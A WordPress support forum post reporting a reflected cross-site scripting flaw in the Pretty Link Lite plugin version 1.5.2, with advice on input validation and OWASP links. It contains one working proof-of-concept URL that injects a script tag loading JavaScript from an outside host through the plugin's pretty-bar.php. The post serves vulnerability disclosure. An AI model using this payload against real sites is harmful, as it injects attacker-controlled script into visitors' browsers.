[Plugin: Pretty Link Lite] 1.5.2 XSS vulnerability
-
There is a report of XSS-vulnerability in this WordPress-plugin: https://seclists.org/bugtraq/2011/Dec/26 which I have now tested and it seems to be valid:
wp-content/plugins/pretty-link/pretty-bar.php?url=”><SCRIPT SRC=https://ha.ckers.org/xss.js></SCRIPT>
If this PHP-file is not meant to be called and executed by users one should add prohibitive line to the PHP-file. There is plenty of examples in other modules or I can give you one. If this is please ensure proper user input validation.
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_SheetI tested with WordPress version 3.2.1 and plugin version 1.5.2. Please contact me if you need any help!
Viewing 4 replies - 1 through 4 (of 4 total)
Viewing 4 replies - 1 through 4 (of 4 total)
- The topic ‘[Plugin: Pretty Link Lite] 1.5.2 XSS vulnerability’ is closed to new replies.
